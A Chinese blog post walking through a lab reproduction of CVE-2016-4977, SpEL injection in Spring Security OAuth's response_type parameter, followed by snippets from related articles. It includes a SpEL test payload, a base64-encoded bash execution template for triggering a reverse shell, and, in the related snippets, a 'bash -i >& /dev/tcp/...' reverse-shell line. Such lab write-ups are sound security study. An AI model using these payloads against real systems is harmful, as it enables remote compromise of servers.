Spring Security OAuth模块远程代码执行漏洞小记

最新推荐文章于 2025-08-05 14:43:08 发布
最新推荐文章于 2025-08-05 14:43:08 发布
阅读量384 收藏 10
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 漏洞安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_66908301/article/details/143480575

Spring Security OAuth模块远程代码执行(CVE-2016-4977)

漏洞描述

        Pivotal Spring Security OAuth是美国Pivotal Software公司的一个项目,该项目为Spring Web应用程序添加OAuth1和OAuth2功能提供支持。Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。

漏洞复现

复现通过搭建spring 漏洞环境,可利用vulhub开源靶场测试,靶场安装,查看文末教程

访问到spring靶场页面

首先通过拼接下面的uri回车测试是否存在漏洞,需要填写用户名和密码,我们这里填入admin:admin即可,查看回显有计算结果,说明存在漏洞。

/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

找一个反弹shell命令,我用的是棱角社区     [~]#棱角 ::Edge.Forum*

将反弹shell命令进行base64编码,绕过java限制

再将base64编码的反弹shell命令拼接在下面的命令中,在传入服务器后进行base64解码并执行

bash -c {echo,base64编码的反弹shell命令}|{base64,-d}|{bash,-i}

将拼接的命令复制,执行poc.py,然后输入粘贴刚才复制的命令再次编码,复制最后的编码结果。

将复制的编码替换url中的${233*233},回车访问触发反弹shell

(CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1799
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
复现CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞
记录并分享学习安全的知识点..
01-15 1000
一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 二、漏洞复现 发现页面如下: poc如下: http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1346
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
Spring Security OAuth2 远程命令执行漏洞
wutiangui的博客
09-09 589
准备shell代码:bash -i >& /dev/tcp/192.168.155.2/1111 0>&1。python3 poc.py #输入要执行的命令,会返回处理后的命令,这里输入whoami。出现以下报错,表示漏洞存在(response_type里面的命令执行了)将上面的命令加入到response_type参数部分,得到变形后的url。返回了进程,表示代码执行了,但这没有回显,是无回显RCE。执行变形后的payload得到shell。用admin:admin登陆。六、Getshell。
CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞
weixin_54376843的博客
08-29 411
在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。然后输入构造好的反弹shell命令,回车继续执行。把执行结果粘贴出来,放在下面的payload中。将命令base64编码【随便找一个编码的网站。执行上面的脚本【在放脚本的目录下执行】输入账号密码admin admin。【攻击机IP+开启监听的端口】构造反弹shell命令【备用】最后去靶机关闭docker容器。
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1987
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
qq_54713392的博客
05-08 866
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
spring security oauth2.0 (讲义+代码)
03-10
本讲义结合代码将深入探讨如何利用Spring Security OAuth2.0 实现这一目标。 首先,OAuth2.0 有四个核心角色:资源所有者(Resource Owner)、客户端(Client)、资源服务器(Resource Server)和授权服务器...
Spring Security OAuth2 实现登录互踢的示例代码
08-19
Spring Security OAuth2 实现登录互踢的示例代码 Spring Security OAuth2 是一个基于 OAuth2 协议的身份验证框架,提供了丰富的身份验证机制和授权机制。本文主要介绍了 Spring Security OAuth2 实现登录互踢的示例...
Spring Security OAuth过期的解决方法
09-07
因此,应当选择Spring Security的核心模块,而不是单独的Spring Security OAuth依赖。 3. **利用Spring Security 5.x的OAuth2支持**: Spring Security 5.x引入了对OAuth2和OpenID Connect 1.0的支持,这意味着你...
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5955
cve-2016-4977(spring-security-oauth) RCE漏洞复现
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977)
来到了学渣的博客
11-09 2007
访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要命令执行需要把执行结果带外才行,java的命令执行漏洞基本需要编码 http://www.jackson-t.ca/runti
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
EC_Carrot的博客
08-02 789
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞复现 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5987
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
使用Spring SecurityOAuth 2.0保护Spring微服务架构
最佳 Java 编程
06-09 1032
“我喜欢编写身份验证和授权代码。” 〜从来没有Java开发人员。 厌倦了一次又一次地建立相同的登录屏幕? 尝试使用Okta API进行托管身份验证,授权和多因素身份验证。 每个开发人员都希望能够更快,更有效地进行构建以支持规模。 使用Spring构建微服务架构可以为您的架构增加弹性和弹性,这将使其优雅地失效并无限扩展。 借助Spring Security及其OAuth 2.0支持,您还...
spring security oauth2的学习过程(一)
it帝国的博客-辉
02-26 1282
几个月之前我我发了一段时间研究过这个东西,最新想重新温习一下,然后把这个过程记录下来。首先我们先来理解一下auth2是什么,这边我们引用了阮一峰的一篇文章(写的也是很不错),这里我直接附上其链接http://www.ruanyifeng.com/blog/2014/05/oauth_2_0.html 首先要好好的去理解这篇文章,理解好了,才会有对后面的一些东西轻松一点。如果你看过...
搞懂玩爆OAuth 2.0—OAuth2.0身份验证漏洞
Eason_LYC安全白帽子的成长博客
05-30 5981
详细讲解OAuth2.0基础原理和授权认证具体实现方式! 并由此讲解OAuth2.0全方位安全漏洞,并配有靶场,边看边练!!!
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 407
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
星图云开发者平台赋能商储油安全管控数字化转型
最新发布
DevMate的博客
08-05 342
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值